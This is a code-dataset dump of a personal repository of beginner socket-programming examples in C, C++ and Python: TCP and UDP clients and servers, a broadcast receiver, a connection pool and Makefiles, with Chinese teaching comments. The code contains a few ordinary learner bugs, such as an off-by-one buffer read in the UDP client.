"blob_id": "1882a3845d323ed430cb3a6fddf7fc8c0a64f52d",
"content_id": "f2dd4c795d1bd62660541da4fcb65c93cdbbf06c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1131,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 50,
"path": "/socket_test/main.c",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "/* Copyright(C)\n * For free\n * All right reserved\n */\n/**\n * @file main.c\n * @Synopsis Example for socket client in C.\n *\t\tinput:\t./test 127.0.0.1 8888\n * @author Saki Shum, [email protected]\n * @version 0.0.1\n * @date 2013-09-04\n */\n\n#include <netinet/in.h>\n// ----------- Socket -------------\n#include <sys/types.h>\n#include <sys/socket.h>\n// ----------- Socket -------------\n#include <arpa/inet.h>\n#include <unistd.h>\n\n#include <stdlib.h>\n#include <stdio.h>\n#include <stdint.h>\n#include <string.h>\n#include <errno.h>\n\nint main(int argc, char* argv[]) {\n\tif (argc < 3) {\n\t\tprintf(\"connect address prot\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\t// domain:IPv4 type:TCP\tprotocol:当protocol为0时,会自动选择type类型对应的默认协议\n\tint fd = socket(AF_INET, SOCK_STREAM, 0);\n\tstruct sockaddr_in my_addr;\n\n\tmy_addr.sin_addr.s_addr = inet_addr(argv[1]);\n\tmy_addr.sin_family = AF_INET;\t\n\tmy_addr.sin_port = htons(strtol(argv[2], NULL, 10));\n\n\tint ret = connect(fd, (struct sockaddr*)&my_addr, sizeof(struct sockaddr_in));\n\n\tif (-1 == ret) {\n\t\tperror(\"Connect failed:\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tclose(fd);\n\texit(EXIT_SUCCESS);\n}\n\n"
},
{
"alpha_fraction": 0.6072767376899719,
"alphanum_fraction": 0.6304299831390381,
"avg_line_length": 29.233333587646484,
"blob_id": "bfda6272b6c792ae35154bd32d7a9735d8f64229",
"content_id": "b8bd08633a534cc4a9563236079669a34011ad8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 5961,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 150,
"path": "/socket_example/server.c",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "#include <sys/types.h>\n#include <sys/socket.h>\n#include <stdio.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <string.h>\n\n// 打开—读/写—关闭 模式\n// SBLARSC\n// socket -> bind -> listen -> accept -> recv -> send -> close\n// 1) 创建 socket\n// 2)绑定 socket 和 端口号, bind\n// 3)监听该端口, listen\n// 4)接收来自客户端的连接请求, accept\n// 5)从 socket 中读取数据, recv\n// 6)向 socket 中发送数据, send\n// 7)关闭 socket, close\n\n#define PORT 12000\n#define BUFFER_SIZE 40\n\n/*\n * 用于保存 socket 信息的结构体\n * struct sockaddr {\n * \t\tunsigned short sa_family;\t\t\t// 2 , 地址族, AF_xxx\n * \tchar sa_data[14];\t\t\t\t\t// 14, 字节的协议地址\n * };\n *\n * 比 sockaddr 更方便使用的结构:\n * 16 Byte:\n * struct sockaddr_in { \n *\t\tshort int \t\t\tsin_family; // 2, 地址族\n * \t\tunsigned short int sin_port; \t// 2, 端口号(2^16, 1~1024 为保留端口,选择 1025~65535 之间的端口号)\n * \t\tstruct in_addr \tsin_addr; \t// 4, 32 位 IP 地址\n * \t\tunsigned char \tsin_zero[8]; // 8, 以 0 填充以保持与 struct sockaddr 同样大小\n * };\n *\n * // 包含该 socket 的 IP地址和端口号\n * struct in_addr { \n * \t\tunion {\n * \t\t\tstruct { u_char s_b1,s_b2,s_b3,s_b4; } S_un_b;\n * \t\t\tstruct { u_short s_w1,s_w2; } S_un_w;\n * \t\t\tu_long S_addr; \n * \t} S_un;\n * \t#define s_addr S_un.S_addr\n * }; \n * */\n\n// 两个网络程序之间的一个网络连接包含 5 种信息:\n// 通信协议、本地协议地址、本地主机端口、远端协议地址和远端协议端口\n\nvoid err_sys(const char *str) {\n\tperror(str);\n}\n\n// wrapper function\nint Socket(int family, int type, int protocol) {\n\tint n = 0;\n\tif ((n = socket(family, type, protocol)) < 0) {\n\t\terr_sys(\"Socket error.\");\n\t}\n\treturn n;\n}\n\nint main(void) {\n char buf[BUFFER_SIZE];\n int server_sockfd, client_sockfd;\n size_t sin_size = sizeof(struct sockaddr_in);\n struct sockaddr_in server_address;\n struct sockaddr_in client_address;\n memset(&server_address, 0, sizeof(server_address));\n\n\t// 无论是TCP还是UDP,socket 都需要与一个本地的IP与端口相对应,称之为 源地址 和 源端口。\n\t// 当只有单一IP的时候,就可以用INADDR_ANY代替那个单一的IP,因为内核分配时只能选择这一个IP。\n\t// INADDR_ANY 所有本机 IP\n server_address.sin_family = AF_INET;\t\t\t// 指代协议族, IPv4\n server_address.sin_addr.s_addr = INADDR_ANY;\t// 用于多 IP 机器上(多网卡), 自动填入本机地址, 值为 0(会由内核自由选择分配IP)\n //server_address.sin_port = 0;\t\t\t\t\t// 0 表示系统随机选择一个未被占用的端口号\n server_address.sin_port = htons(PORT);\t\t\t// 将主机的无符号短整形数转换成网络字节顺序, host to net short int 16位\n\t// 网络端一般是大端,大端高字节在地址低位,低字节在地址高位\n\tprintf(\"%X\\n\", 12000);\t\t\t// 2EE0 小端\n\tprintf(\"%X\\n\", htons(12000));\t// E02E 大端\n\t// htonl(): 把32位值从主机字节序转换成网络字节序\n\t// htons(): 把16位值从主机字节序转换成网络字节序\n\t// ntohl(): 把32位值从网络字节序转换成主机字节序\n\t// ntohs(): 把16位值从网络字节序转换成主机字节序\n\n // 建立服务器端 socket (TCP)\n if ((server_sockfd = Socket(AF_INET, SOCK_STREAM, 0)) < 0) {\n perror(\"server_sockfd creation failed\");\n exit(EXIT_FAILURE);\n }\n\n // 将套接字绑定到服务器的网络地址上(IP:Port) bind,0:成功, <0:失败\n if ((bind(server_sockfd, (struct sockaddr *)&server_address, sizeof(struct sockaddr))) < 0) {\n perror(\"server socket bind failed\");\n exit(EXIT_FAILURE);\n }\n\n // 建立监听队列, 设置对大连接数量为 5(大多数系统默认缺省值为 20)\n // listen 使得 socket 处于被动的监听模式,并为 socket 建立一个输入数据队列,将到达的服务请求保存在次队列中,直到程序处理他们\n listen(server_sockfd, 5);\n\n // 死循环,同 while(1) {}\n\tfor (; ; ) {\n\t\t// 等待客户端连接请求到达(阻塞)\n\t\t// 同一时间 Server 只能处理一个 Client 请求:在使用当前连接的 socket 和 client 进行交互的时候,不能够 accept 新的连接请求。\n\t\tprintf(\"Start accept client.\\n\");\n\t\t// listening socket, connected socket\n\t\t// 让服务器接收客户端的连接请求。\n\t\tclient_sockfd = accept(server_sockfd, (struct sockaddr *)&client_address, (socklen_t *)&sin_size);\n\t\tif (client_sockfd < 0) {\n\t\t\tperror(\"accept client socket 
failed\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t\tprintf(\"accept done.\\n\");\n\t\t// inet_ntoa, 将网络地址转换成“.”点隔的字符串格式。\n\t\tprintf(\"Client port: %d\\n\", client_address.sin_port);\t\t\t\t// 客户端端口号\n\t\tprintf(\"Client IP : %s\\n\", inet_ntoa(client_address.sin_addr));\t// 客户端 IP 地址\n\n\t\tint ret = 0;\n\t\t// 接收客户端数据\n\t\t// int recv(int sockfd, void *buf, int len, int flags)\n\t\t/*if ((ret = recv(client_sockfd, buf, BUFFER_SIZE, 0)) < 0) {*/\n\t\tif ((ret = read(client_sockfd, buf, BUFFER_SIZE)) < 0) {\n\t\t\tperror(\"recv client data failed\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t\tprintf(\"ret: %d, strlen(buf): %tu\\n\", ret, strlen(buf));\n\n\t\tprintf(\"receive from client:%s\\n\",buf);\n\t\t// 发送数据到客户端\n\t\t/*if ((ret = send(client_sockfd, buf, strlen(buf), 0)) < 0) {*/\n\t\t// 这里如果使用 BUFFER_SIZE, 会发送多余的数据\n\t\tif ((ret = write(client_sockfd, buf, strlen(buf))) < 0) {\n\t\t\tperror(\"server send failed\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\n\t\tprintf(\"Len: %d\\n\", ret);\n\t\tclose(client_sockfd);\t\t\t\t// 关闭连接\n\t\t//shutdown(int sockfd, int how);\t// how 为 shutdown 操作的方式\n\t\t// how: 0:不允许继续接收数据,1:不允许继续发送数据,2:不允许继续发送和发送数据,均不允许则调用 close()\n\t}\n close(server_sockfd);\n\n exit(EXIT_SUCCESS);\n}\n"
},
{
"alpha_fraction": 0.5787139534950256,
"alphanum_fraction": 0.6008869409561157,
"avg_line_length": 18.60869598388672,
"blob_id": "0eed09fbfa7cc7119021d501d7bf8679f85c90f2",
"content_id": "8ffe0fc56b1d6f49ff5e827e9bc669c1ea9e9026",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 902,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 46,
"path": "/connect_pool/main.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <iostream>\n#include \"connecttionPool.h\"\n\nclass TObject {\npublic:\n\tTObject(void) {\n\t\t++uid_;\n\t}\n\t~TObject(void) {}\n\tvoid release(void) {\n\t\tprintf(\"release()\\n\");\n\t}\n\tlong long getUID(void) const {\n\t\treturn uid_;\n\t}\n\nprivate:\n\tstatic long long uid_;\n};\n\nlong long TObject::uid_ = 0;\n\nint main(int, char**) {\n\tConnectionPool<TObject> *objPool;\n\tobjPool = new ConnectionPool<TObject>(2);\n\tTObject *pobj1 = objPool->alloc();\n\tif (pobj1) {\n\t\tstd::cout << \"1. \" << pobj1->getUID() << std::endl;\n\t}\n\tTObject *pobj2 = objPool->alloc();\n\tif (pobj2) {\n\t\tstd::cout << \"2. \" << pobj2->getUID() << std::endl;\n\t}\n\tTObject *pobj3 = objPool->alloc();\n\tif (pobj3) {\n\t\tstd::cout << \"3. \" << pobj3->getUID() << std::endl;\n\t}\n\tobjPool->recycle(pobj2);\n\tpobj3 = objPool->alloc();\n\tif (pobj3) {\n\t\tstd::cout << \"3.1. \" << pobj3->getUID() << std::endl;\n\t}\n\texit(EXIT_SUCCESS);\n}\n"
},
{
"alpha_fraction": 0.5875576138496399,
"alphanum_fraction": 0.6059907674789429,
"avg_line_length": 24.52941131591797,
"blob_id": "ca9235e8f81ffc707ac9a8f9cb0591ce42e4b1b3",
"content_id": "630176e639a0971eb68e9e5e2fa9255d1de5902c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 434,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 17,
"path": "/socket_example/Makefile",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "EXEC = test\nSOURCES = $(wildcard *.c)\nHEADERS = $(wildcard *.h*)\nOBJECTS = $(SOURCES:.c=.o)\nFLAG = -Wall \n\nall: $(EXEC)\n\n$(EXEC): $(OBJECTS) $(HEADERS)\n\t$(CC) $(FLAG) -L/usr/local/Cellar/boost/1.54.0/lib -lpthread -lboost_system -lboost_filesystem-mt -lboost_thread-mt $(OBJECTS) -o $(EXEC)\n \n%.o: %.c $(HEADERS) \n\t$(CC) $(FLAG) -I/usr/local/Cellar/boost/1.54.0/include -c $< -o $@\n\n.PHONY: clean\nclean:\n\t$(RM) $(EXEC) $(OBJECTS) *.o\n"
},
{
"alpha_fraction": 0.444029837846756,
"alphanum_fraction": 0.45895522832870483,
"avg_line_length": 13.88888931274414,
"blob_id": "5046abc445eddda91d58d12f5eb9801200ffb8d3",
"content_id": "612e6b20cf0949856b0ea322c88515b4b360aa94",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 268,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 18,
"path": "/connect_pool/Makefile",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "SRC += $(wildcard *.cpp)\\\n\t$(wildcard base/*.cpp) \nEXC := test\nOBJ := $(SRC:.cpp=.o)\nCXX := g++-4.7\nFLAG := -std=c++11 -Wall -g\n\nall: $(EXC)\n\n$(EXC): $(OBJ)\n\t$(CXX) $(FLAG) $? -o $@\n\n%.o:%.cpp \n\t$(CXX) $(FLAG) -c $< -o $@\n\n.PHONY: clean\nclean: $(EXC) $(OBJ)\n\t$(RM) $?\n"
},
{
"alpha_fraction": 0.5684803128242493,
"alphanum_fraction": 0.5703564882278442,
"avg_line_length": 22.173913955688477,
"blob_id": "a6a4ef760839052d897229a15437a57d4aa5d788",
"content_id": "b3d5c540c0f44b2e686e08d4cd29d6578c017f49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 533,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 23,
"path": "/broken_pipe/test.py",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#coding=utf-8\n\nimport socket\n\ndef hack_fileobject_close():\n if getattr(socket._fileobject.close, '__hacked__', None):\n print 'return'\n return\n\n old_close = socket._fileobject.close\n\n def new_close(self, *p, **kw):\n try:\n return old_close(self, *p, **kw)\n except Exception, e:\n print \"ignore %s.\" % str(e)\n new_close.__hacked__ = True\n socket._fileobject.close = new_close\n\nif __name__ == '__main__':\n hack_fileobject_close()\n print 'Done.'\n"
},
{
"alpha_fraction": 0.6323046684265137,
"alphanum_fraction": 0.6460932493209839,
"avg_line_length": 22.07575798034668,
"blob_id": "04aa267fca179bb60e75909cc474ab849880acbc",
"content_id": "ad4a169b424e54340cb1950163bd481382e3620e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1523,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 66,
"path": "/UDP_broadcast/broadcast_server/main.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/socket.h>\n#include <unistd.h>\n#include <sys/types.h>\n#include <netdb.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <string.h>\n\n#define PORT 6000\n\nint main(int, char**) {\n\tsetvbuf(stdout, NULL, _IONBF, 0);\n\tfflush(stdout);\n\n\t// bind the address\n\tstruct sockaddr_in addrto;\n\tbzero(&addrto, sizeof(struct sockaddr_in));\n\taddrto.sin_family = AF_INET;\n\taddrto.sin_addr.s_addr = htonl(INADDR_ANY);\n\taddrto.sin_port = htons(PORT);\n\n\t// broadcast address\n\tstruct sockaddr_in from;\n\tbzero(&from, sizeof(struct sockaddr_in));\n\tfrom.sin_family = AF_INET;\n\tfrom.sin_addr.s_addr = htonl(INADDR_ANY);\n\tfrom.sin_port = htons(PORT);\n\n\tint sockfd = -1;\n\tif ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) {\n\t\tfprintf(stderr, \"socket error\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tconst int opt = -1;\n\t// set the socket type brocast\n\tint nb = 0;\n\tnb = setsockopt(sockfd, SOL_SOCKET, SO_BROADCAST, (char*)&opt, sizeof(opt));\n\tif (nb == -1) {\n\t\tfprintf(stderr, \"set socket error\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (bind(sockfd, (struct sockaddr *)(&addrto), sizeof(struct sockaddr))) {\n\t\tfprintf(stderr, \"bind error\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tunsigned int len = sizeof(struct sockaddr_in);\n\tchar msg[100] = {0};\n\n\tfor (;;) {\n\t\t// recv msg from brocast addr\n\t\tint ret = recvfrom(sockfd, msg, 100, 0, (struct sockaddr*)(&from), (socklen_t*)(&len));\n\t\tif (ret <= 0) {\n\t\t\tfprintf(stderr, \"read error\\n\");\n\t\t} else {\n\t\t\tprintf(\"%s\\n\", msg);\n\t\t}\n\t\tsleep(1);\n\t}\n\n\texit(EXIT_SUCCESS);\n}\n"
},
{
"alpha_fraction": 0.5801724195480347,
"alphanum_fraction": 0.6586207151412964,
"avg_line_length": 27.292682647705078,
"blob_id": "149101b2eaad04dade0069cb3c38b62bfc3965c3",
"content_id": "b4486891d53fd7032ce9804057258e178839d8c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1428,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 41,
"path": "/boost_ip2socket/main.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "/**\n * @file main.cpp\n * @Synopsis 获取多个节点IP, 比如google 就有好几个ip.\n *\t\tURL: http://blog.csdn.net/huang_xw/article/details/8502895\n *\t\toutput:\n *\t\t[2404:6800:4005:c00::68]:80\n *\t\t173.194.127.83:80\n *\t\t173.194.127.80:80\n *\t\t173.194.127.84:80\n *\t\t173.194.127.81:80\n *\t\t173.194.127.82:80\n * @author Saki Shum, [email protected]\n * @version 0.0.1\n * @date 2014-05-22\n */\n#include <cstdio>\n#include <cstdlib>\n#include <iostream>\n#include <boost/asio.hpp>\n\nint main(void) {\n\t// 定义IO 服务对象\n\t// io_service 就是boost::asio 基于OS的I/O引擎, 其他的功能是建立在它之上的 。\n\tboost::asio::io_service my_io_service ;\n\t// 定义解析对象\n\t// resolver 接管了 DNS, 将开发者的查询(query) 转换为endpoint ( IP:Port) 地址。\n\tboost::asio::ip::tcp::resolver resolver(my_io_service);\n\t// 查询socket的相应信息\n\t// query 保存用户查询, 可以使主机名+服务命, 可以是单独的服务名, 可以是单独的主机名...\n\tboost::asio::ip::tcp::resolver::query query(\"www.baidu.com\", \"http\");\n\t// 进行域名或者服务解释,以便生成SOCKET内部使用的数据格式\n\tboost::asio::ip::tcp::resolver::iterator iter = resolver.resolve(query);\n\tboost::asio::ip::tcp::resolver::iterator end; // End marker.\n\n\twhile (iter != end) {\n\t\tboost::asio::ip::tcp::endpoint endpoint = *iter++;\n\t\tstd::cout << \"Endpoint: \" << endpoint << std::endl;\n\t}\t\n\n\treturn EXIT_SUCCESS;\n}\n"
},
{
"alpha_fraction": 0.6396344900131226,
"alphanum_fraction": 0.6561964750289917,
"avg_line_length": 22.33333396911621,
"blob_id": "e12a7b482b1589a18e6338b650c3e91b5e5bea94",
"content_id": "72788ae73fb91282069f451d9256ba3452c78250",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1925,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 75,
"path": "/UDP_client/mian.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "/**\n * @file mian.cpp\n * @Synopsis UDP Client example. (单播)\n *\t\tUsage: ./test localhost \n * @author Saki Shum, [email protected]\n * @version 0.0.1\n * @date 2015-11-20\n */\n#include <stdio.h>\n#include <stdlib.h>\n#include <iostream>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <errno.h>\n#include <string.h>\n#include <arpa/inet.h>\t// sockaddr_in\n#include <netdb.h>\t\t// gethostbyname\n#include <unistd.h>\t\t// close\n\n#define SERVER_PORT 8888\n#define MAX_BUF_SIZE 1024\n\n// 如果使用了 connect 就可以使用 send, recv 而不是使用 sendto, recvfrom 接口, 但还是还是利用传输层的UDP协议\n\nvoid udps_requ(int sockfd, const struct sockaddr_in *addr, int len) {\n\tchar buffer[MAX_BUF_SIZE];\n\tint size = 0;\n\twhile (1) {\n\t\tprintf(\"Please input char:\\n\");\n\t\tfgets(buffer, MAX_BUF_SIZE+1, stdin);\n\t\t// 阻塞\n\t\tsize = sendto(sockfd, buffer, strlen(buffer), 0, (struct sockaddr*)addr, len);\n\t\tif (size < 0) {\n\t\t\tfprintf(stderr, \"\\n\\rsend error.\\r\\n\");\n\t\t}\n\t\tbzero(buffer, MAX_BUF_SIZE);\n\t}\n}\n\nint main(int argc, char *argv[]) {\n\tint sockfd;\n\tstruct sockaddr_in addr;\n\tstruct hostent *host;\n\tif (argc != 2) {\n\t\tfprintf(stderr, \"Usage:%s server_ip\\n\", argv[0]);\n\t\texit(EXIT_FAILURE);\n\t}\n\n\t// 返回对应于给定主机名的包含主机名字和地址信息的hostent结构指针。\n\t// 返回:非空指针——成功,空指针——出错,同时设置 h_errno\n\tif ((host = gethostbyname(argv[1])) == NULL) {\n\t\tfprintf(stderr, \"Gethostname error.\\n\");\n\t\therror(\"gethostbyname\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\t// socket\n\tsockfd = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (socket < 0) {\n\t\tfprintf(stderr, \"Socket Error.\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\t// IP:PORT\n\tbzero(&addr, sizeof(struct sockaddr_in));\n\taddr.sin_family = AF_INET;\n\taddr.sin_port = htons(SERVER_PORT);\n\taddr.sin_addr = *((struct in_addr*)host->h_addr);\n\n\tudps_requ(sockfd, &addr, sizeof(struct sockaddr_in));\n\n\tclose(sockfd);\n\n\texit(EXIT_SUCCESS);\n}\n\n"
},
{
"alpha_fraction": 0.6329987645149231,
"alphanum_fraction": 0.6499372720718384,
"avg_line_length": 22.426469802856445,
"blob_id": "aeb6facd1757121d4594c8237db8f275fd6804e6",
"content_id": "00d51314b8d9307ea5dc979aaf6d37cbb59ec7cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1696,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 68,
"path": "/UDP_example/main.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "/**\n * @file main.cpp\n * @Synopsis UDP Server example.(单播)\n * @author Saki Shum, [email protected]\n * @version 0.0.1\n * @date 2015-11-20\n */\n\n#include <cstdio>\n#include <cstdlib>\n#include <string.h>\t\t\t// strlen\n#include <sys/types.h>\t\t\n#include <sys/socket.h>\t\t// socket\n#include <errno.h>\t\t\t// strerror\n#include <unistd.h>\t\t\t// close\n#include <arpa/inet.h>\t\t// sockaddr_in\n\n#define SERVER_PORT 12000\n#define MAX_MSG_SIZE 1024\n\n// 如果使用了 connect 就可以使用 send, recv 而不是使用 sendto, recvfrom 接口, 但还是还是利用传输层的UDP协议\n\nvoid udps_respon(int sockfd) {\n\tstruct sockaddr_in addr;\n\tint n;\n\tsocklen_t addrlen;\n\tchar msg[MAX_MSG_SIZE];\n\twhile (1) {\n\t\tbzero(msg, sizeof(msg));\n\t\taddrlen = sizeof(sockaddr);\n\t\t// ssize_t recvfrom(int, void*, size_t, int, sockaddr*, socklen_t*)\n\t\t// 阻塞\n\t\tn = recvfrom(sockfd, static_cast<void*>(msg), MAX_MSG_SIZE, 0, (struct sockaddr*)&addr, &addrlen);\n\t\tmsg[n] = '\\0';\n\t\tfprintf(stdout, \"Server have recvived: %s\", msg);\n\t}\n}\n\nint main(void) {\n\tint sockfd;\n\tstruct sockaddr_in addr;\n\t// Socket\n\t// AF_INET\t IPv4\n\t// SOCK_DGRAM UDP\n\tsockfd = socket(AF_INET, SOCK_DGRAM, 0);\n\tif (sockfd < 0) {\n\t\tperror(\"Socket Error.\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\t// IP:Port\n\tbzero(&addr, sizeof(struct sockaddr_in));\n\taddr.sin_family = AF_INET;\n\taddr.sin_addr.s_addr = htonl(INADDR_ANY);\t// 设置本地主机 IP 地址\n\taddr.sin_port = htons(SERVER_PORT);\t\t\t// 设置端口号\n\n\t// bind\n\t// sockaddr_in ==转==> sockaddr\n\tif (bind(sockfd, reinterpret_cast<struct sockaddr*>(&addr), sizeof(struct sockaddr)) < 0) {\n\t\tperror(\"Bind Error.\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tudps_respon(sockfd);\n\tclose(sockfd);\n\n\treturn EXIT_SUCCESS;\n}\n\n"
},
{
"alpha_fraction": 0.5731707215309143,
"alphanum_fraction": 0.5853658318519592,
"avg_line_length": 12.666666984558105,
"blob_id": "9273234b3039e30e53ded1c7600a62b1e59f37c0",
"content_id": "aca3ba5db5f1990a2cb9881b272b86b5e014fa09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 82,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 6,
"path": "/socket_test/Makefile",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "all: main.c\n\t$(CC) -o test $? -O2 -Wall -Werror\n\n. PHONY : clean\nclean:\n\t-rm test\n"
},
{
"alpha_fraction": 0.6260408759117126,
"alphanum_fraction": 0.6373959183692932,
"avg_line_length": 16.83783721923828,
"blob_id": "d3e8f7fdca48bd011e3d835d32a1e376c1e32c65",
"content_id": "9ca6e057711c3c68e07aff7021428edf38a69a8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1365,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 74,
"path": "/connect_pool/connecttionPool.h",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "/**\n * @file connecttionPool.h\n * @Synopsis 用来分配连接对象的,这样不会有内存泄漏的问题\n * @author Saki Shum, [email protected]\n * @version 0.0.1\n * @date 2015-11-02\n */\n\n#pragma once \n\n#include <stdio.h>\n#include <deque>\n#include <set>\n\ntemplate<typename DataType>\nclass ConnectionPool {\npublic:\n\tConnectionPool(int max_size) \n\t: max_size_(max_size), aliveCount_(0), deadCount_(0) {\n\t}\n\n\t~ConnectionPool(void) { }\n\n\tDataType *alloc(void) {\n\t\tDataType *obj = NULL;\n\t\tif (deadCount_ > 0) {\n\t\t\tobj = deadObjs_.front();\n\t\t\tdeadObjs_.pop_front();\n\t\t\t--deadCount_;\n\t\t} else {\n\t\t\tif (max_size_ >= 0 && getCount() >= max_size_) {\n\t\t\t\tprintf(\"overflow.\\n\");\n\t\t\t\treturn NULL;\n\t\t\t}\n\t\t\tobj = new DataType();\n\t\t}\n\t\taliveObjs_.insert(obj);\n\t\t++aliveCount_;\n\n\t\treturn obj;\n\t}\n\n\tvoid recycle(DataType *obj) {\n\t\tobj->release();\n\t\taliveObjs_.erase(obj);\n\t\t--aliveCount_;\n\t\tdeadObjs_.push_back(obj);\n\t\t++deadCount_;\n\t}\n\n\tint getCount(void) const {\n\t\treturn aliveCount_ + deadCount_;\n\t}\n\tint getMaxSize(void) const {\n\t\treturn max_size_;\n\t}\n\tint getAliveCount(void) const {\n\t\treturn aliveCount_;\n\t}\n\tint getDeadCount(void) const {\n\t\treturn deadCount_;\n\t}\n\tstd::set<DataType*> &getAliveObjs(void) {\n\t\treturn aliveObjs_;\n\t}\n\nprivate:\n\tint max_size_;\n\tint aliveCount_;\n\tint deadCount_;\n\n\tstd::deque<DataType*> deadObjs_;\n\tstd::set<DataType*> aliveObjs_;\n}; // ConnectionPool\n\n"
},
{
"alpha_fraction": 0.6702380776405334,
"alphanum_fraction": 0.6916666626930237,
"avg_line_length": 25.25,
"blob_id": "c55ecb2b267c239ab44871eaa9c8cdda1c377dc4",
"content_id": "5ecd6069732258139fa8ebc151bc74857c3261d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 952,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 32,
"path": "/socket_error/client/main.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
"text": "#include <cstdio>\n#include <cstdlib>\n#include <cstring>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <unistd.h>\n#include <netinet/in.h>\n\nint main(void) {\n\tstruct sockaddr_in serverAddr;\n\tbzero(&serverAddr, sizeof(serverAddr));\n\tserverAddr.sin_family = AF_INET;\n\tserverAddr.sin_port = htons(1234);\n\t//serverAddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\tserverAddr.sin_addr.s_addr = INADDR_ANY; // 服务器IP地址--允许连接到所有本地地址上\n\n\tint connfd = socket(AF_INET, SOCK_STREAM, 0);\n\n\t// 建立与 TCP 服务器的连接\n\t// 第 2,3 个参数分别是一个指向套接字地质结构的指针和该结构的大小。 \n\tint connResult = connect(connfd, (struct sockaddr*)&serverAddr, sizeof(serverAddr));\n\tif (connResult < 0) {\n\t\t// Connection refused\t61\n\t\t// Operation timed out\t60\n\t\tperror(\"Connect fail.\\n\");\n\t\tclose(connfd);\n\t} else {\n\t\tprintf(\"Connect success.\\n\");\n\t}\n\tclose(connfd);\n\texit(EXIT_SUCCESS);\n}\n"
},
{
"alpha_fraction": 0.6972428560256958,
"alphanum_fraction": 0.707317054271698,
"avg_line_length": 27.984615325927734,
"blob_id": "3be7794a2804d0628d11e008dc16579852ed2bc8",
"content_id": "208595951096246d6407d45312e4c8577e1ed672",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2648,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 65,
"path": "/socket_error/server.cpp",
"repo_name": "sakishum/My_Socket",
"src_encoding": "UTF-8",
